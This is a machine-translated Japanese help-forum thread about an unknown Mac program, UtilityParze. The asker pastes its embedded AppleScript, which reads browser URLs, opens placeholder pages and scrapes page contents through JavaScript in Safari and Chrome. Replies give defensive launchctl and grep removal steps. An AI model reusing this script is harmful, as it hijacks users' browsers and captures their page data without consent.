web-dev-qa-db-ja.com

UtilityParzeとは何ですか?

OS X CatalinaでMacbook Airを使用しています。

今日Safariを開くと、tilityParzeにSafariへのアクセスを許可するかどうかを尋ねるセキュリティダイアログがポップアップ表示されました。これまでオンラインでこのアプリケーションについての言及は見つかりませんでしたが、ファイルシステムの/Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParzeに実行可能ファイルが見つかりました。

これはほとんど人間が読める形式ではありませんが、埋め込みスクリプトは次のとおりです。

if application "Safari" is running then 
    run script "tell application \"Safari\" to return URL of front document" 
end if

if application "Safari" is running then 
    tell application id (id of application "Safari") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Safari") to activate 
    delay 5.0 
end if

if application "Safari" is running then 
    run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window 
    tell application id (id of application \"Safari\") to open location \"[UA_URL]\" 
    tell application id (id of application \"Safari\") to set the content to the text of document 1 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        tell application id (id of application \"Safari\") to set the content to the text of document 1 
    end repeat 
    tell front window of application \"Safari\" to close last tab 
    tell front window of application \"Safari\" to set current tab to tab activeIndex 
    return content as string" 
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" to get URL of active tab of first window" 
end if

if application "Google Chrome" is running then 
    tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Google Chrome") to activate 
    delay 5.0 
end if

if application "Google Chrome" is running then
    tell application "Google Chrome"
        open location "[UA_URL]"
    end tell
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" 
    set the activeUrl to get URL of front window's active tab 
    open location \"[UA_URL]\" 
    set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    end repeat 
    tell front window's active tab to close 
    set tabIndex to 0 
    repeat with currentTab in (tabs of (front window)) 
        set tabIndex to tabIndex + 1 
        if URL of currentTab is activeUrl then 
            set (active tab index of (front window)) to tabIndex 
            exit repeat 
        end if 
    end repeat 
    return content as string 
    end tell" 
end if

このプログラムを聞いた人はいますか?これまでのところ、アクセスを拒否しましたが、削除はしていません。ブラウザを開こうとしたときに、最初にページに再ルーティングするのは面倒なことだと思います。

3
owengall

私(2020年1月12日日曜日の午前9時52分頃)に、同様の "Utilityparve"プロンプトがMojaveに表示され、Google Chromeへのアクセス許可を求めました。アクセスを許可しませんでした。

私は過去に、私が手動でシステムから排除しなければならないアドウェアに接続された、同様の不可解なブラウザーアクセス要求をしました。

「Macperformance」は、アクティブなユーザーの「ライブラリ」内の非常に類似した場所に繰り返しアクセスするように見える例です。 「UtilityParve」と「Macperformance」の間に直接接続があるかどうかはわかりませんが、現在、両方が私のライブラリに存在しています。

「Utilityparveは「UpdatesMac」フォルダーにありますが、「Macperformance」は「UpdateMac」フォルダーにあります。

オンラインでその機能の説明がないことに基づいて、「Utilityparve」とアドウェアと見なされる「Macperformance」を削除します。

0
PCH

実行してみましたか?ターミナルでlaunchctl list | grep Utilityを実行して、起動エージェントが実行されているかどうかを確認します。これにより、アプリケーションが引き続き実行されますか?その場合は、launchctl unload com.UtilityParze(または以前にリストしたときに表示される識別子/名前)を実行して、launchdがアプリケーションを存続させないようにし、関連するすべてのファイルを削除する必要があります。 launchctl list com.UtilityParzeは、それらのファイルがどこにあるか/どこにあるかについてのヒントを与えるはずです。

この起動エージェントの.plist定義の3つの最も可能性の高い場所は次のとおりです。

  • /Library/LaunchAgents
  • /Library/LaunchDaemons
  • /Users/markus/Library/LaunchAgents

これらすべてのフォルダでcom.UtilityParze.plistを探します。ただし、ステルス名を使用する可能性があるため、launchctlを使用した検査の方がおそらく良いでしょう。別のオプションは、次のようなすべての.plist定義で疑わしい名前をgrepすることです。

  • grep -R Parze /Library/LaunchAgents
  • grep -R Parze ~/Library/LaunchAgents
  • Sudo grep -R Parze /Library/LaunchDaemons

起動エージェント定義ファイルには、実行可能ファイルへのパスを含める必要があります。マルウェアの作成者がファイルを多くの場所に分散させなかった場合、問題のファイルはすべて、実行可能ファイルと一緒に1つのフォルダーにある可能性があります。実行可能ファイルを見つければ、おそらく削除する他のすべてのファイルも見つけるでしょう。ただし、必ず最初にエージェントをアンロードしてください。

うまくいけばマルウェアファイルを見つける別の方法は、すべてのライブラリでfindを実行することです。

  • Sudo find /Library -iname Parze
  • find ~/Library -iname Parze

LaunchAgentsフォルダー内の奇妙なファイルとLibraryフォルダー内の他のいくつかの場所を見つけるという同様の問題がありました。 UtilityData.plist、UtilityParze.plist、VSearchトロイの木馬ファイルの長いリスト(MacInstallPall、その他いくつかのMacInstall *%&+ @ファイルが含まれていました。Malwarebytesによると、それらはマルウェアでした。隔離する必要がありました。最初に隔離してから削除しましたそれら。

1
Ashok

「Easyfind」という名前のアプリは、ファイルを非常に簡単に検索できます。 「UtilityParze」を検索して、4つの結果を出力しました。まとめて削除します。

0
buyuno